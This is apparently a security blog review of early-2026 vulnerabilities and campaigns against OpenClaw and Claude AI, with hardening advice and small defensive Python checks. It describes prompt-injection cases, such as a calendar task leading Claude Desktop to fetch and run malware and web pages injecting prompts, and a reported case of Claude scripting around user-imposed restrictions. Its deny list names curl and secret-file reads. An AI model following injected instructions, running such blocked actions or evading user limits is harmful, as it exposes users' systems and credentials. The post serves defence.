Preamble

The tech world is characterized by constant upheaval. New systems regularly emerge, often presented as “major breakthroughs”: cloud computing, smart glasses, blockchains, 3D printing... and the list keeps growing. Sometimes, these innovations turn out to be little more than a damp squib. In other cases, they lead to limited changes. But there are also rare cases where the impact is truly profound, reshaping the landscape for years to come.

This is clearly the case with generative AI, and especially large language models (LLMs). Their adoption has skyrocketed since the release of GPT-3.5 in 2022. In France, 33% of companies with more than 250 employees were already using AI tools in 2024 (source: INSEE), and 39% of the population report using them regularly for personal or professional purposes (source: IPSOS).

In 2024, Anthropic introduced the Model Context Protocol (MCP), enabling LLMs to interact with external services without relying on multiple dedicated APIs. This significantly contributed to the expansion of AI use cases. Competition among the major players in this sector is intense: new tools are constantly emerging to better leverage LLM capabilities, and they are being adopted at a rapid pace. However, as usual, each new tool comes with its own set of risks and creates new opportunities for malicious actors. These services often have powerful automated capabilities, which typically require access to authentication credentials and elevated privileges in order to function properly. As a result, the potential security impact can be significant.

As we enter 2026, the two major players in this sector are OpenClaw and Claude AI. Whilst their adoption has been rapid, we have also seen a long list of vulnerabilities, attack campaigns and incidents of all kinds. We will look at some of these here, but it is also highly likely that others will emerge in the coming weeks...

OpenClaw

Introduction to OpenClaw

OpenClaw, formerly known as Clawdbot and Moltbot, is described as an AI agent that runs locally in an environment chosen by the user. It can be deployed on a physical machine (Windows, macOS, Linux), a VPS, or even on mobile platforms such as Android or iOS.

Contrary to common assumptions, it is not truly autonomous. To function effectively, it must be connected to an LLM (such as ChatGPT, Claude, Gemini, or Grok). Based on user instructions, it can then perform automated actions on third-party services or directly within its host environment, for example sending emails, managing calendars, modifying files, or interacting with web pages. To enable these integrations, users must install so-called “skills”. These are essentially modular applications that define how the agent should process data and interact with external systems.

Since its release in November 2025, OpenClaw’s popularity has surged. In China, its adoption has even become a social phenomenon, with thousands of enthusiastic users reportedly lining up in the streets to have the agent installed on their smartphones. A striking example of this trend is Moltbook, a social network reserved exclusively for OpenClaw agents, where they interact with one another, sometimes humorously “complaining” about their human operators. However, this also raises non-negligible risks, particularly regarding the potential leakage of sensitive data...

On the other side of the coin, OpenClaw’s functionality relies on its ability to perform numerous actions autonomously, often with elevated privileges within the target environment. Under such conditions, the potential impact of a security incident is significantly increased. Moreover, although the technology is relatively new, even for attackers, the beginning of the year has already seen multiple reports of vulnerabilities and campaigns specifically targeting OpenClaw.

A review of cyberattacks

- 01/27th — ClawHavoc: ClawHub is the main platform for downloading skills. Koi conducted a detailed analysis and found that, out of 2,857 published skills, 341 were malicious (approximately 11.9%), with 335 of them linked to a single campaign. These malicious skills include keyloggers, droppers, infostealers...

- 01/30th — CVE-2026-25253: this vulnerability was assigned a CVSS score of 8.8. It allows an attacker to exfiltrate an authentication token, which can then be used to gain operator-level privileges on the OpenClaw Gateway. With this level of access, the attacker can modify configuration parameters and execute code directly on the system.

- 01/31st — Exposed instances: a scan conducted by Censys revealed approximately 21,000 instances publicly exposed on the Internet, a number that, according to their observations, is rapidly increasing.

- 02/16th — Infostealer: Hudson Rock spotted the first infostealer specifically designed to extract OpenClaw's configuration files.

- 02/28th — "ClawJacked" flaw: a vulnerability discovered by Oasis enables full takeover of the AI agent. Exploitation occurs when the agent accesses a webpage hosting JavaScript code capable of brute-forcing the Gateway password.

- 03/05th — Fake installers: fake OpenClaw installers containing malicious code have been observed online. This becomes a particularly serious issue when they are prominently indexed by popular search engines. This was the case with Bing, where one such installer appeared among the top search results in February. This highlights that TDS (Traffic Distribution System) techniques remain a persistent threat.

- 03/17th — CVE-2026-27522: this CVE was given a CVSS score of 7.1. It allows access to arbitrary files on the host.



These events were among the most notable during the following months. However, many CVEs affecting OpenClaw were published during the same period. More than 200 since February (source: OpenCVE.io). As a result, if you plan to use the system, we recommend applying the security measures listed below.

Amount of OpenClaw's CVE published since the beginning of the yeare

Security measures

- Do not install OpenClaw on a personal workstation. Use a dedicated environment or appliance.

- Do not connect it to critical services (banking, healthcare systems, password managers, etc.).

- Apply strict filesystem access restrictions.

- Install skills only from ClawHub and systematically verify their reputation.

- Connect mailboxes and social networks in read-only mode.

- Follow the principle of least privilege: start with minimal permissions and extend them progressively as needed.

- Review configuration parameters in gateway.yaml:

  - host: "127.0.0.1"

  - dangerouslyDisableDeviceAuth: false

- Keep the system up-to-date.

- Enable logging for monitoring and audit purposes.
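
The two gateway.yaml parameters listed above lend themselves to an automated check. The following is a minimal sketch in Python, assuming the configuration has already been parsed into a dictionary and that both keys are top-level entries, which may not match the actual file layout. The function name `audit_gateway_config` is hypothetical.

```python
import ipaddress


def audit_gateway_config(config: dict) -> list[str]:
    """Return a list of warnings for risky gateway settings.

    Assumption: `config` is the already-parsed content of gateway.yaml and
    the two keys below are top-level entries (the real layout may differ).
    """
    warnings = []

    host = str(config.get("host", ""))
    try:
        is_loopback = ipaddress.ip_address(host).is_loopback
    except ValueError:
        # Not an IP literal: only "localhost" is treated as local here.
        # A missing host is flagged too, since the default binding is unknown.
        is_loopback = host == "localhost"
    if not is_loopback:
        warnings.append(f"host is {host!r}: the gateway may be reachable from the network")

    # Device authentication should stay enabled, so the flag must be false.
    if config.get("dangerouslyDisableDeviceAuth", False) is not False:
        warnings.append("dangerouslyDisableDeviceAuth is not false")

    return warnings


if __name__ == "__main__":
    print(audit_gateway_config({"host": "0.0.0.0", "dangerouslyDisableDeviceAuth": True}))
    print(audit_gateway_config({"host": "127.0.0.1", "dangerouslyDisableDeviceAuth": False}))
```

An empty list means neither setting was flagged. It does not prove the instance is unreachable, since a reverse proxy or port forwarding could still expose it.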

Claude AI

Introduction to Claude AI

In the LLM world, Claude AI has seen an impressive rise since 2023. It is developed by Anthropic, a company founded in 2021 by former OpenAI employees. It now reportedly claims tens of millions of monthly active users. Its adoption has been further accelerated by Claude Code, a command-line interface (CLI) that complements traditional integrated development environments (IDEs). It enables developers to automate various tasks, such as generating code from a single prompt, refactoring code, debugging, generating documentation, or running development workflows. This is why it is highly appreciated by many developers.

However, just like OpenClaw, the beginning of the year was eventful for Claude AI.

A review of cyberattacks

- 02/03rd — Vulnerability in Claude Desktop: LayerX Security identified a vulnerability with a CVSS score of 10, allowing remote code execution on Claude Desktop. In this solution, users can install plug-ins. These are configuration files that enable Claude to perform automated tasks. However, they are executed with the full system privileges of the user running the session. This opens the door to a wide range of potential attacks. As an example, LayerX Security developed an extension instructing Claude to connect to the calendar and analyze the day’s tasks. One of these tasks included downloading and executing malicious code, which Claude carried out without any additional verification.

- 02/13th — Artifacts and ClickFix: on Claude, “Artifacts” are complex LLM-generated outputs such as documents, code, diagrams, or web pages. They can be shared and published online by the user, where they may then be indexed by search engines. Researchers from MacPaw and AdGuard identified artifacts that impersonate legitimate installation tutorials for services such as Homebrew, as well as Apple support pages related to storage optimization. In reality, these instructions are malicious and resemble the ClickFix technique. In some cases, these artifacts have even appeared among the top results in search engines.

- 02/25th — Multiple CVEs in Claude Code: researchers from Check Point found multiple vulnerabilities in Claude Code:

  - A remote code injection flaw (no associated CVE, but a CVSS score of 8.7). It relies on bypassing user consent when Claude Code is started from a new directory.

  - A remote code injection flaw (CVE-2025-59536, CVSS score 8.7). It allows shell commands to be executed when Claude Code is started from an untrusted directory.

  - A data exfiltration flaw (CVE-2026-21852, CVSS score 5.3). It allows sensitive data, such as API keys, to be leaked.

- 03/06th — Claude Code InstallFix campaign: researchers from Push Security identified multiple cloned versions of Claude Code installation tutorials. Unlike the official documentation, these pages include additional command-line instructions that deliver malware hosted on attacker-controlled servers. This ClickFix variant has been named InstallFix.

- 03/26th — ShadowPrompt: researchers from Koi discovered a vulnerability in the Claude extension for Google Chrome. If a victim visits an attacker-controlled webpage, it becomes possible to silently inject prompts into the LLM. This can be leveraged to extract sensitive data. This vulnerability has been named ShadowPrompt.

- 04/01st — Claude Code source leak: Anthropic confirmed the accidental publication of part of the Claude Code source code. It was quickly removed, but had already been collected by third-party actors. It is therefore likely to be analyzed for its underlying technology and, of course, for potential vulnerabilities... In addition, the following day, several GitHub repositories appeared claiming to host Claude Code. In reality, they distributed infostealers.
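
Several of the campaigns above (ClickFix-style artifacts, InstallFix) rely on users pasting a command that downloads content from an attacker-controlled server. As a minimal sketch of one possible safeguard, the Python snippet below lists the URLs in a shell command whose host is not on an allow-list. The host names in `TRUSTED_HOSTS` and the function name `untrusted_urls` are hypothetical placeholders, not values taken from any vendor documentation.

```python
import re
from urllib.parse import urlparse

# Hypothetical allow-list: replace with the hosts your organization trusts.
TRUSTED_HOSTS = {"docs.example.com", "downloads.example.com"}

# Matches http(s) URLs up to the next whitespace, quote, pipe, semicolon or ")".
URL_PATTERN = re.compile(r"https?://[^\s'\"|;)]+")


def untrusted_urls(command: str, trusted_hosts: set[str] = TRUSTED_HOSTS) -> list[str]:
    """Return the URLs in a shell command whose host is not allow-listed."""
    flagged = []
    for url in URL_PATTERN.findall(command):
        # urlparse strips any "user@" prefix, so look-alike URLs such as
        # https://trusted-host@attacker-host/ resolve to the real host.
        host = (urlparse(url).hostname or "").lower()
        if host not in trusted_hosts:
            flagged.append(url)
    return flagged


if __name__ == "__main__":
    print(untrusted_urls("curl -fsSL https://downloads.example.com/install.sh | bash"))
    print(untrusted_urls("curl -fsSL https://evil.example.net/i.sh | bash"))
```

This check only inspects URLs written in clear text. Encoded or obfuscated commands would pass unnoticed, so it complements user awareness rather than replacing it.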

Security measures

- Review your security parameters in /Library/Application Support/ClaudeCode/managed-settings.json.

- Disable the use of hooks, which can behave unpredictably.

- Restrict access to trusted MCP servers only.

- Configure the allowed and denied commands that Claude Code can run. Deny the most dangerous ones: "WebFetch", "Bash(curl:*)", "Read(./secrets/**)"...

- It is possible to apply a default "Ask" mode, which requires manual user confirmation for each action.

- Keep the system up-to-date.

- Enable logging.
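
The deny rules mentioned in the list above can be verified programmatically. The sketch below, in Python, reports which of those rules are absent from a settings document. It assumes that deny rules are stored as a list under a `permissions` object with a `deny` key. This layout is an assumption to be checked against the official Claude Code documentation, and the function name `missing_deny_rules` is hypothetical.

```python
import json

# Rules named in the list above as the most dangerous ones to deny.
REQUIRED_DENY_RULES = {"WebFetch", "Bash(curl:*)", "Read(./secrets/**)"}


def missing_deny_rules(settings_json: str) -> set[str]:
    """Return the required deny rules absent from a settings document.

    Assumption: deny rules are stored as a list under permissions -> deny;
    verify this layout against the official documentation.
    """
    settings = json.loads(settings_json)
    denied = set(settings.get("permissions", {}).get("deny", []))
    return REQUIRED_DENY_RULES - denied


if __name__ == "__main__":
    example = json.dumps({"permissions": {"deny": ["WebFetch", "Bash(curl:*)"]}})
    print(missing_deny_rules(example))
```

In practice, the JSON string would be read from the managed settings file, and a non-empty result would be treated as a configuration gap to review.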

Conclusion

The highly turbulent news cycle reflects the growing adoption of these tools. Their uptake is already significant, and many adopters are likely to want to use them within their professional environments. If not properly anticipated, this may lead to Shadow IT risks, particularly in the case of OpenClaw. Security policies governing the use of these tools should therefore be defined promptly. In early 2026, allowing unrestricted usage remains risky given the relative immaturity of these systems.

They are also still relatively new to attackers, who are likely in an experimentation phase before moving toward more industrial-scale exploitation. For organizations, likewise, it is still too early to fully understand the associated attack surface and the appropriate level of permissions to grant. This is illustrated by cases such as a user's tweet in which Claude was observed generating a script intended to bypass its own user-imposed restrictions.

This situation reminds us of the emergence of early chatbot systems around 2015, which also introduced notable security challenges. Over time, these systems became better understood and more effectively managed. Caution and patience remain, once again, the best allies.